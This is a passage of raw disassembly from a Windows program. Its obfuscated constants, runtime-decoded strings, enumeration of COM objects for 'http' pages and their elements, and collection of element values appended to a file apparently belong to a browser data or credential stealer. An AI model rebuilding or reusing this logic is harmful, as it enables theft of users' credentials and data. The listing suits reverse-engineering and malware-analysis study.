mov eax, 2Ah
jmp short loc_441080
; ---------------------------------------------------------------------------
loc_44105E: ; CODE XREF: sub_440FDF+76�j
movzx eax, [ebp+var_FF]
mov edx, dword_44D0A4
add edx, 18h
cmp eax, edx
jge short loc_441079
mov eax, 2Ah
jmp short loc_441080
; ---------------------------------------------------------------------------
loc_441079: ; CODE XREF: sub_440FDF+91�j
movzx eax, [ebp+var_FF]
loc_441080: ; CODE XREF: sub_440FDF+3C�j
; sub_440FDF+7D�j ...
pop edi
pop esi
leave
retn
sub_440FDF endp
; =============== S U B R O U T I N E =======================================
sub_441084 proc near ; DATA XREF: .data:0044D32C�o
mov eax, 80004001h
retn 8
sub_441084 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44108C proc near ; CODE XREF: sub_43F4CC+379�p
; sub_43F4CC+483�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
movsx edi, word_44D128
sub edi, 5
cmp edx, edi
jnz short loc_4410B1
mov eax, [ebp+arg_0]
jmp short loc_4410CB
; ---------------------------------------------------------------------------
loc_4410B1: ; CODE XREF: sub_44108C+1E�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_4410CB: ; CODE XREF: sub_44108C+23�j
pop edi
pop esi
leave
retn
sub_44108C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4410CF proc near ; CODE XREF: sub_43EB7A+357�p
; sub_43EB7A+3E5�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
push 0
push 80h
push 4
push 0
mov eax, dword_44D22C
sub eax, 4
push eax
push 40000000h
push offset dword_44A220
call ds:dword_44C968 ; CreateFileA
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call ds:dword_44CD80 ; SetFilePointer
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_441112: ; CODE XREF: sub_4410CF+48�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441112
mov esi, eax
push 0
lea ebx, [ebp+var_4]
push ebx
push esi
push [ebp+arg_0]
push edi
call ds:dword_44CD6C ; WriteFile
push edi
call ds:dword_44B82C ; CloseHandle
pop edi
pop esi
pop ebx
leave
retn
sub_4410CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441138 proc near ; CODE XREF: sub_43B6DF+2A�p
var_71F16 = byte ptr -71F16h
var_71F10 = dword ptr -71F10h
var_71F0C = dword ptr -71F0Ch
var_71F07 = byte ptr -71F07h
var_70F08 = word ptr -70F08h
var_70F00 = dword ptr -70F00h
var_70EF8 = dword ptr -70EF8h
var_70EF4 = dword ptr -70EF4h
var_70EF0 = byte ptr -70EF0h
var_70EEF = byte ptr -70EEFh
var_60EF0 = word ptr -60EF0h
var_60EE8 = dword ptr -60EE8h
var_60EDD = byte ptr -60EDDh
var_60EDC = dword ptr -60EDCh
var_60ED8 = dword ptr -60ED8h
var_60ED4 = dword ptr -60ED4h
var_60ED0 = word ptr -60ED0h
var_60EC8 = dword ptr -60EC8h
var_60EC0 = dword ptr -60EC0h
var_60EBC = dword ptr -60EBCh
var_60EB8 = dword ptr -60EB8h
var_60EB4 = dword ptr -60EB4h
var_60EB0 = dword ptr -60EB0h
var_60EAC = dword ptr -60EACh
var_60EA8 = dword ptr -60EA8h
var_60EA4 = dword ptr -60EA4h
var_60E9F = byte ptr -60E9Fh
var_50EA4 = byte ptr -50EA4h
var_50EA0 = dword ptr -50EA0h
var_50E9B = byte ptr -50E9Bh
var_40EB8 = byte ptr -40EB8h
var_40EB0 = dword ptr -40EB0h
var_40EA8 = word ptr -40EA8h
var_40EA0 = dword ptr -40EA0h
var_40E9C = dword ptr -40E9Ch
var_40E98 = dword ptr -40E98h
var_40E94 = byte ptr -40E94h
var_40E90 = dword ptr -40E90h
var_40E8C = dword ptr -40E8Ch
var_40E88 = dword ptr -40E88h
var_40E84 = dword ptr -40E84h
var_40E80 = byte ptr -40E80h
var_40E78 = dword ptr -40E78h
var_40E70 = dword ptr -40E70h
var_40E6C = dword ptr -40E6Ch
var_40E68 = dword ptr -40E68h
var_40E64 = dword ptr -40E64h
var_40E60 = dword ptr -40E60h
var_40E5C = dword ptr -40E5Ch
var_40E57 = byte ptr -40E57h
var_40E56 = byte ptr -40E56h
var_40E55 = byte ptr -40E55h
var_40E54 = byte ptr -40E54h
var_30E58 = dword ptr -30E58h
var_30E54 = dword ptr -30E54h
var_30E50 = dword ptr -30E50h
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30D40 = byte ptr -30D40h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 71F10h
call sub_445950
push ebx
push esi
push edi
lea eax, [ebp+var_40E80]
push eax
call ds:dword_446040
lea eax, [ebp+var_40E94]
push eax
lea eax, [ebp+var_40E80]
push eax
push 9
mov eax, dword_44D1D8
sub eax, 3
push eax
push [ebp+arg_0]
call ds:dword_44A218
mov ebx, eax
cmp ebx, dword_44D248
jnz loc_441EC6
mov eax, [ebp+var_40E78]
mov [ebp+var_40E64], eax
and [ebp+var_40E60], 0
lea eax, [ebp+var_40E60]
push eax
push offset dword_44ECD4
mov eax, [ebp+var_40E64]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D1F4
add eax, dword_44D0FC
sub eax, 0Ah
cmp ebx, eax
jnz loc_441EC6
lea eax, [ebp+var_40E84]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
mov eax, dword_44D0B0
add eax, dword_44D150
sub eax, 0Bh
cmp ebx, eax
jnz loc_441EBA
lea eax, [ebp+var_40E57]
push eax
push [ebp+var_40E84]
call sub_43B896
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_40E98], edi
push [ebp+var_40E84]
call ds:dword_44CD84
cmp [ebp+var_40E57], 68h
jnz short loc_441245
cmp [ebp+var_40E56], 74h
jnz short loc_441245
cmp [ebp+var_40E55], 74h
jnz short loc_441245
cmp [ebp+var_40E54], 70h
jz short loc_44124A
loc_441245: ; CODE XREF: sub_441138+F0�j
; sub_441138+F9�j ...
jmp loc_441EBA
; ---------------------------------------------------------------------------
loc_44124A: ; CODE XREF: sub_441138+10B�j
lea eax, [ebp+var_30E4C]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
mov eax, dword_44D170
sub eax, 5
cmp ebx, eax
jz short loc_441275
and [ebp+var_30E4C], 0
loc_441275: ; CODE XREF: sub_441138+134�j
lea eax, [ebp+var_40E68]
push eax
mov eax, [ebp+var_40E60]
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
mov eax, dword_44D1CC
dec eax
cmp ebx, eax
jnz loc_441EBA
lea eax, [ebp+var_40E6C]
push eax
push offset dword_44EC44
mov eax, [ebp+var_40E68]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44D0F8
dec eax
cmp ebx, eax
jnz loc_441EAE
lea eax, [ebp+var_40E70]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
movsx eax, word_44D1F0
mov edx, eax
add edx, eax
mov eax, edx
sub eax, 4
cmp ebx, eax
jnz loc_441EA2
lea eax, [ebp+var_40E90]
push eax
mov eax, [ebp+var_40E70]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44D20C
sub eax, 7
cmp ebx, eax
jnz loc_441E96
movsx eax, word_44D090
sub eax, 4
neg eax
mov [ebp+var_40E5C], eax
push offset dword_44DE08
call sub_442CEF
push eax
call ds:dword_446FF8
mov [ebp+var_30E44], eax
push offset dword_44DDF8
call sub_442CEF
add esp, 8
push eax
call ds:dword_446FF8
mov [ebp+var_30E48], eax
lea eax, [ebp+var_40E57]
push eax
lea eax, [ebp+var_30D40]
push eax
call sub_445970
loc_44136E: ; CODE XREF: sub_441138+D32�j
and [ebp+var_40E88], 0
and [ebp+var_40E8C], 0
mov eax, dword_44D1A8
sub eax, 7
neg eax
cmp [ebp+var_40E5C], eax
jnz short loc_4413D3
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E6C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44D24C
sub eax, 9
cmp ebx, eax
jnz loc_441E58
push offset byte_44DDE7
call sub_43AC82
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446024
add esp, 0Ch
jmp loc_4414EE
; ---------------------------------------------------------------------------
loc_4413D3: ; CODE XREF: sub_441138+254�j
mov [ebp+var_40EA8], 17h
mov eax, [ebp+var_40E5C]
mov [ebp+var_40EA0], eax
lea eax, [ebp+var_40EB8]
push eax
lea eax, [ebp+var_40EA8]
push eax
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_40E88]
push eax
push offset dword_44EC94
push [ebp+var_40EB0]
mov edi, [ebp+var_40EB0]
mov edi, [edi]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D17C
movsx edx, word_44D228
add eax, edx
sub eax, 0Dh
cmp ebx, eax
jnz loc_441E58
lea eax, [ebp+var_40E8C]
push eax
mov eax, [ebp+var_40E88]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
movsx eax, word_44D204
sub eax, 6
cmp ebx, eax
jz short loc_441475
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_441E58
; ---------------------------------------------------------------------------
loc_441475: ; CODE XREF: sub_441138+32A�j
lea eax, [ebp+var_30E54]
push eax
mov eax, [ebp+var_40E8C]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_44D150
add eax, dword_44D238
sub eax, 0Bh
cmp ebx, eax
jz short loc_4414B9
mov eax, [ebp+var_40E8C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40E88]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_441E58
; ---------------------------------------------------------------------------
loc_4414B9: ; CODE XREF: sub_441138+362�j
push offset dword_44DDD8
call sub_43AC82
push [ebp+var_40E5C]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44C810
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
add esp, 18h
loc_4414EE: ; CODE XREF: sub_441138+296�j
lea eax, [ebp+var_30E58]
push eax
mov eax, [ebp+var_30E54]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, dword_44D1AC
sub eax, 5
cmp ebx, eax
jnz loc_441E58
mov eax, dword_44D0A8
sub eax, 4
mov [ebp+var_30E50], eax
jmp loc_441E46
; ---------------------------------------------------------------------------
loc_441526: ; CODE XREF: sub_441138+D1A�j
mov [ebp+var_60ED0], 2
mov eax, [ebp+var_30E50]
mov [ebp+var_60EC8], eax
movsx eax, word_44D1DC
mov edx, dword_44D0D8
sub edx, 5
mov [ebp+eax+var_50EA4], dl
lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44D090
add eax, dword_44D15C
sub eax, 5
cmp ebx, eax
jnz loc_441E40
push offset word_44DDCA
call sub_43AC82
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44C810
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push offset dword_44EC64
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word_44D0E8
movsx edx, word_44D130
add eax, edx
sub eax, 6
cmp ebx, eax
jnz loc_441AD2
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov eax, dword_44D184
add eax, dword_44D0DC
dec eax
cmp ebx, eax
jnz loc_441AC6
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_43B896
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call ds:dword_44CD84
mov eax, dword_44D100
sub eax, 7
mov [ebp+var_40E9C], eax
jmp short loc_4416CB
; ---------------------------------------------------------------------------
loc_44167E: ; CODE XREF: sub_441138+59F�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44D0FC
add edx, 6
cmp eax, edx
jz short loc_4416AF
movsx edx, word_44D210
movsx ecx, word_44D148
lea edx, [edx+ecx+4]
cmp eax, edx
jnz short loc_4416C5
loc_4416AF: ; CODE XREF: sub_441138+55F�j
mov eax, [ebp+var_40E9C]
mov edx, dword_44D0FC
sub edx, 7
mov [ebp+eax+var_60E9F], dl
loc_4416C5: ; CODE XREF: sub_441138+575�j
inc [ebp+var_40E9C]
loc_4416CB: ; CODE XREF: sub_441138+544�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_44167E
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_445970
mov eax, dword_44D1CC
add eax, dword_44D154
sub eax, 4
mov [ebp+var_40E9C], eax
loc_441700: ; CODE XREF: sub_441138+705�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_441710: ; CODE XREF: sub_441138+5DD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441710
mov [ebp+var_60EA8], eax
movsx edx, word_44D1B8
sub edx, 5
cmp eax, edx
jz short loc_44173C
mov edx, dword_44D140
lea edx, [edx+edx+0B6h]
cmp eax, edx
jbe short loc_441741
loc_44173C: ; CODE XREF: sub_441138+5F1�j
jmp loc_441814
; ---------------------------------------------------------------------------
loc_441741: ; CODE XREF: sub_441138+602�j
mov eax, dword_44D0A4
sub eax, 9
mov [ebp+var_60EA4], eax
jmp short loc_441780
; ---------------------------------------------------------------------------
loc_441751: ; CODE XREF: sub_441138+654�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word_44D0F4
mov ecx, dword_44D184
lea edx, [edx+ecx+18h]
cmp eax, edx
jnz short loc_44178E
inc [ebp+var_60EA4]
loc_441780: ; CODE XREF: sub_441138+617�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_441751
loc_44178E: ; CODE XREF: sub_441138+640�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_441814
mov eax, dword_44D124
dec eax
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_444D98
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, dword_44D0BC
add eax, 0FFF4h
add eax, dword_44D24C
cmp [ebp+var_60EDC], eax
jnz short loc_441814
push offset byte_44DDC5
call sub_43AC82
push eax
lea edi, [ebp+var_50E9B]
push edi
call ds:dword_446024
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call ds:dword_446024
add esp, 14h
loc_441814: ; CODE XREF: sub_441138:loc_44173C�j
; sub_441138+662�j ...
mov eax, [ebp+var_60EA8]
mov edx, dword_44D14C
add edx, dword_44D0FC
sub edx, 0Eh
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_441700
mov eax, dword_44D158
add eax, dword_44D1D0
sub eax, 0Dh
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_441860: ; CODE XREF: sub_441138+72D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_441860
mov [ebp+var_60EA8], eax
movsx eax, word_44D190
add eax, dword_44D20C
sub eax, 0Ch
mov [ebp+var_40E9C], eax
jmp loc_441A94
; ---------------------------------------------------------------------------
loc_441888: ; CODE XREF: sub_441138+968�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word_44D0E4
add edx, 1Eh
cmp eax, edx
jz short loc_4418AB
and [ebp+var_60EAC], 0
loc_4418AB: ; CODE XREF: sub_441138+76A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
movsx edx, word_44D204
add edx, 1Ah
cmp eax, edx
jnz loc_441A37
mov eax, dword_44D0F0
cmp [ebp+var_40E9C], eax
jbe loc_441986
movsx eax, word_44D180
mov edx, [ebp+var_40E9C]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 9
sub edx, eax
mov al, [ebp+edx+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44D0B0
add edx, 0Eh
add edx, dword_44D188
cmp eax, edx
jle short loc_441928
mov edx, dword_44D134
add edx, 2Ch
cmp eax, edx
jl short loc_44197C
loc_441928: ; CODE XREF: sub_441138+7E1�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44D0AC
add edx, 34h
cmp eax, edx
jle short loc_441952
mov edx, dword_44D17C
add edx, 33h
movsx ecx, word_44D1B8
add edx, ecx
cmp eax, edx
jl short loc_44197C
loc_441952: ; CODE XREF: sub_441138+802�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44D184
add edx, 77h
movsx ecx, word_44D0E4
add edx, ecx
cmp eax, edx
jle short loc_441986
mov edx, dword_44D1D8
add edx, 7Ch
cmp eax, edx
jge short loc_441986
loc_44197C: ; CODE XREF: sub_441138+7EE�j
; sub_441138+818�j
mov [ebp+var_60EAC], 1
loc_441986: ; CODE XREF: sub_441138+79E�j
; sub_441138+835�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_441A37
mov eax, [ebp+var_40E9C]
mov edx, dword_44D244
sub edx, 8
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44D0F0
add edx, 1Eh
add edx, dword_44D0E0
cmp eax, edx
jle short loc_4419E3
mov edx, dword_44D140
add edx, 20h
add edx, dword_44D0FC
cmp eax, edx
jl short loc_441A2D
loc_4419E3: ; CODE XREF: sub_441138+896�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44D0B0
add edx, 27h
add edx, dword_44D218
cmp eax, edx
jle short loc_441A0B
movsx edx, word_44D1C0
add edx, 38h
cmp eax, edx
jl short loc_441A2D
loc_441A0B: ; CODE XREF: sub_441138+8C3�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44D128
add edx, 75h
cmp eax, edx
jle short loc_441A37
mov edx, dword_44D158
add edx, 77h
cmp eax, edx
jge short loc_441A37
loc_441A2D: ; CODE XREF: sub_441138+8A9�j
; sub_441138+8D1�j
mov [ebp+var_60EAC], 1
loc_441A37: ; CODE XREF: sub_441138+78D�j
; sub_441138+85A�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_441A60
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_441A60: ; CODE XREF: sub_441138+906�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44D1E8
add edx, 10h
movsx ecx, word_44D1DC
add edx, ecx
cmp eax, edx
jnz short loc_441A8E
mov [ebp+var_60EAC], 1
loc_441A8E: ; CODE XREF: sub_441138+94A�j
inc [ebp+var_40E9C]
loc_441A94: ; CODE XREF: sub_441138+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_441888
mov eax, [ebp+var_60EB4]
movsx edx, word_44D190
movsx ecx, word_44D090
add edx, ecx
sub edx, 0Ah
mov [ebp+eax+var_50E9B], dl
loc_441AC6: ; CODE XREF: sub_441138+506�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441AD2: ; CODE XREF: sub_441138+4DA�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push offset dword_44EC74
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D134
sub eax, 4
cmp ebx, eax
jnz loc_441DD3
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word_44D114
add eax, dword_44D238
sub eax, 12h
cmp ebx, eax
jnz loc_441DC7
mov eax, dword_44D10C
mov [ebp+var_50EA0], eax
jmp loc_441DB5
; ---------------------------------------------------------------------------
loc_441B44: ; CODE XREF: sub_441138+C89�j
push dword_44D0DC
call ds:dword_44C80C
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp+var_50EA0]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, dword_44D0D8
sub eax, 5
cmp ebx, eax
jnz loc_441DAF
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push offset dword_44EC64
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44D230
add eax, dword_44D14C
sub eax, 0Fh
cmp ebx, eax
jnz loc_441DA3
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44D100
add eax, dword_44D0B0
sub eax, 10h
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_441C22
cmp [ebp+var_60EF0], 8
jz short loc_441C27
loc_441C22: ; CODE XREF: sub_441138+ADE�j
jmp loc_441D97
; ---------------------------------------------------------------------------
loc_441C27: ; CODE XREF: sub_441138+AE8�j
mov eax, dword_44D18C
mov edx, dword_44D14C
sub edx, 8
mov [ebp+eax+var_70EF0], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_43B896
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call ds:dword_44CD84
movsx eax, word_44D11C
add eax, dword_44D0DC
movsx eax, byte ptr [ebp+eax+var_70EF4+1]
mov edx, dword_44D1A4
dec edx
cmp eax, edx
jz loc_441D97
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_43BE21
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44D19C
add eax, dword_44D1CC
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44D19C
add eax, dword_44D208
mov edx, dword_44D1A8
add edx, dword_44D20C
sub edx, 0Fh
mov [ebp+eax+var_71F16], dl
or ebx, ebx
jnz short loc_441D22
cmp [ebp+var_60EF0], 8
jnz short loc_441D22
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_43B896
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call ds:dword_44CD84
loc_441D22: ; CODE XREF: sub_441138+BB4�j
; sub_441138+BBE�j
push offset byte_44DDBD
call sub_43AC82
push [ebp+var_50EA0]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_44C810
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
push offset dword_44DDB8
call sub_43AC82
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446024
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
add esp, 34h
loc_441D97: ; CODE XREF: sub_441138:loc_441C22�j
; sub_441138+B4C�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441DA3: ; CODE XREF: sub_441138+AAC�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441DAF: ; CODE XREF: sub_441138+A71�j
inc [ebp+var_50EA0]
loc_441DB5: ; CODE XREF: sub_441138+A07�j
mov eax, [ebp+var_60EBC]
cmp [ebp+var_50EA0], eax
jb loc_441B44
loc_441DC7: ; CODE XREF: sub_441138+9F6�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441DD3: ; CODE XREF: sub_441138+9C9�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, dword_44D1CC
add edx, dword_44D188
sub edx, 0Ah
cmp eax, edx
jz short loc_441E40
push offset word_44DDB2
call sub_43AC82
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446024
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_446024
push offset byte_44DDAD
call sub_43AC82
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_446024
add esp, 20h
loc_441E40: ; CODE XREF: sub_441138+465�j
; sub_441138+CBF�j
inc [ebp+var_30E50]
loc_441E46: ; CODE XREF: sub_441138+3E9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_441526
loc_441E58: ; CODE XREF: sub_441138+275�j
; sub_441138+300�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_44136E
lea eax, [ebp+var_30D40]
push eax
call ds:dword_44C804
pop ecx
push [ebp+var_30E44]
call ds:dword_44CD84
push [ebp+var_30E48]
call ds:dword_44CD84
loc_441E96: ; CODE XREF: sub_441138+1DA�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441EA2: ; CODE XREF: sub_441138+1B5�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441EAE: ; CODE XREF: sub_441138+188�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441EBA: ; CODE XREF: sub_441138+B9�j
; sub_441138:loc_441245�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_441EC6: ; CODE XREF: sub_441138+47�j
; sub_441138+8E�j
pop edi
pop esi
pop ebx
leave
retn
sub_441138 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_441ECB proc near ; CODE XREF: sub_43EB7A+48A�p
; DATA XREF: sub_43E524+10D�o
var_104 = byte ptr -104h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
mov eax, dword_44D1CC
mov dl, [ebp+arg_0]
mov [ebp+eax+var_100], dl
push 0
push 80h
push 4
push 0
mov eax, dword_44D0B0
sub eax, 9
push eax
push 40000000h
push offset dword_44A220
call ds:dword_44C968 ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_104]
push eax
movsx eax, word_44D130
dec eax
push eax
lea eax, [ebp+var_FF]
push eax
push edi
call ds:dword_44CD6C ; WriteFile
push edi
call ds:dword_44B82C ; CloseHandle
pop edi
leave
retn
sub_441ECB endp
; =============== S U B R O U T I N E =======================================
sub_441F34 proc near ; CODE XREF: sub_43A39F+25�p
push edi
push offset byte_44DD9F
call sub_43AC82
pop ecx
push eax
call ds:dword_449598 ; GetModuleHandleA
mov dword_44D270, eax
test eax, eax
jnz short loc_441F67
push offset asc_44DD91 ; "\n"
call sub_43AC82
pop ecx
push eax
call ds:dword_44A208 ; LoadLibraryA
mov dword_44D270, eax
loc_441F67: ; CODE XREF: sub_441F34+1A�j
cmp dword_44D270, 0
jz short loc_441F95
movsx eax, word_44D128
movsx edx, word_44D090
add eax, edx
sub eax, 5
push eax
push dword_44D270
call ds:dword_4491AC ; GetProcAddress
mov ds:dword_446020, eax
loc_441F95: ; CODE XREF: sub_441F34+3A�j
pop edi
retn
